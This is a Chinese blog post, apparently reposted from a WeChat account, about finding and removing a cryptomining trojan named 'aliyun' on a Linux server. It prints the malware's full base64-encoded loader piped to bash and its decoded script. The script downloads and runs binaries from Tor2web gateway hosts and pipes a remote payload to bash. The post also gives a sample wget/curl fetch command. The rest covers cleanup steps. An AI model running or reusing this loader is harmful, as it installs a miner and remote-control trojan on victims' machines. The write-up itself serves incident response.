背景
分析
以下是相关代码,有想研究的小伙伴可以拿去进行研究。
exec &>/dev/nullecho ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10cnVtcHM0YzRvaHh2cTdvCmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmZvciBpIGluIC91c3IvYmluICRkaXIgL2Rldi9zaG0gL3RtcCAvdmFyL3RtcDtkbyB0b3VjaCAkaS9pICYmIGNkICRpICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp4KCkgewpmPS9pbnQKZD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCndnZXQgLXQxIC1UMTAgLXFVLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJGYgLU8kZCB8fCBjdXJsIC1tMTAgLWZzU0xrQS0gJDEkZiAtbyRkCmNobW9kICt4ICRkOyRkO3JtIC1mICRkCn0KdSgpIHsKeD0vY3JuCndnZXQgLXQxIC1UMTAgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSR4IHx8IGN1cmwgLW0xMCAtZnNTTGtBLSAkMSR4Cn0KZm9yIGggaW4gdG9yMndlYi5pbyA0dG9yLm1sIG9uaW9uLm1uIG9uaW9uLmluLm5ldCBvbmlvbi50byBkMndlYi5vcmcgY2l2aWNsaW5rLm5ldHdvcmsgb25pb24ud3Mgb25pb24ubnogb25pb24uZ2xhc3MgdG9yMndlYi5zdQpkbwppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzAwKS9pbzsgdGhlbgp4IHRydW1wczRjNG9oeHZxN28uJGgKZWxzZQpicmVhawpmaQpkb25lCgppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzAwKS9pbzsgdGhlbgooCnUgJHQudG9yMndlYi5pbyB8fAp1ICR0LjR0b3IubWwgfHwKdSAkdC5kMndlYi5vcmcgfHwKdSAkdC5vbmlvbi5tbiB8fAp1ICR0Lm9uaW9uLmluLm5ldCB8fAp1ICR0Lm9uaW9uLnRvIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC5vbmlvbi5wZXQgfHwKdSAkdC50b3Iyd2ViLnN1IHx8CnUgJHQub25pb24uZ2xhc3MgfHwKdSAkdC5vbmlvbi53cwopfGJhc2gKZmkK|base64 -d | bash
解码以后的内容如下:
exec & > /dev/nullexport PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbint=trumps4c4ohxvq7odir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)for i in /usr/bin $dir /dev/shm /tmp /var/tmp;dotouch $i/i && cd $i && rm -f i && break;donex() {f=/intd=./$(date|md5sum|cut -f1 -d-)wget -t1 -T10 -qU- --no-check-certificate $1$f -O$d || curl -m10 -fsSLkA- $1$f -o$dchmod +x $d;$d;rm -f $d}u() {x=/crnecho "wget -t1 -T10 -qU- -O- --no-check-certificate $1$x || curl -m10 -fsSLkA- $1$x"}for h in tor2web.io 4tor.ml onion.mn onion.in.net onion.to d2web.org civiclink.network onion.ws onion.nz onion.glass tor2web.sudoif ! ls /proc/$(cat /tmp/.X11-unix/00)/io; thenx trumps4c4ohxvq7o.$helsebreakfidoneif ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then(u $t.tor2web.io ||u $t.4tor.ml ||u $t.d2web.org ||u $t.onion.mn ||u $t.onion.in.net ||u $t.onion.to ||u $t.civiclink.network ||u $t.onion.pet ||u $t.tor2web.su ||u $t.onion.glass ||u $t.onion.ws)|bashfi
/tmp/.X11-unix/00是什么鬼 X11 server需要有一种途径来跟X11 client来进行沟通。在网络上它们可以通过TCP/IP Socket来实现沟通,而在本机上它们通过一个Unix-domain socket来沟通.Unix-domain socket其实很TCP/IP socket很类似,只不过它指向的是一个文件路径,而且无需通过网卡进行转发,因此相对来说更安全,更更快些。而 /tmp/.X11-unix 其实就是存放这些Unix-domain Socket的地方。一般来说 /tmp/.X11-unix 下面只会有一个 Unix-domain Socket(因为一般只有一个Xserver在运行),但若系统同时运行多个Xserver,也可能会有多个Unix Domain Socket出现的情况。具体可以参考参考内容里的文章,里面有详细说明
tor2web.io4tor.mlonion.mnonion.in.netonion.tod2web.orgciviclink.networkonion.wsonion.nzonion.glasstor2web.su
wget -t1 -T10 -qU- --no-check-certificate trumps4c4ohxvq7o.onion.mn/int -O./e0ee4ac14e82501dc127890f75770c17 || curl -m10 -fsSLkA- trumps4c4ohxvq7o.onion.mn/int -o./e0ee4ac14e82501dc127890f75770c17crn检测结果:
int检测结果:
通过pstree,我们可以清晰的看到两个异常的进程OYK6yV和 jKhnvF
通过分析ps -ef的结果,获取异常异常进程信息
综合所有信息,我们发现jKhnvF是挖矿进程,OYK6yV是木马远控的进程。
移除挖矿木马
然后杀掉两个恶意进程
清除/root/.aliyun.sh和/opt/aliyun.sh 看着运行正常的系统,内心还是很满足的。
后续
参考内容
-
http://blog.lujun9972.win/blog/2018/04/24/docker%E5%AE%B9%E5%99%A8%E4%B8%AD%E8%B7%91gui%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E6%96%B9%E6%B3%95/index.html【/tmp/.X11-unix=是什么玩意】
-
https://unix.stackexchange.com/questions/196677/what-is-tmp-x11-unix 【what-is-tmp-x11-unix】
-
https://www.cnblogs.com/jinanxiaolaohu/p/11993504.html
原文始发于微信公众号(代码审计SDL):一个名叫aliyun的挖矿木马处理过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论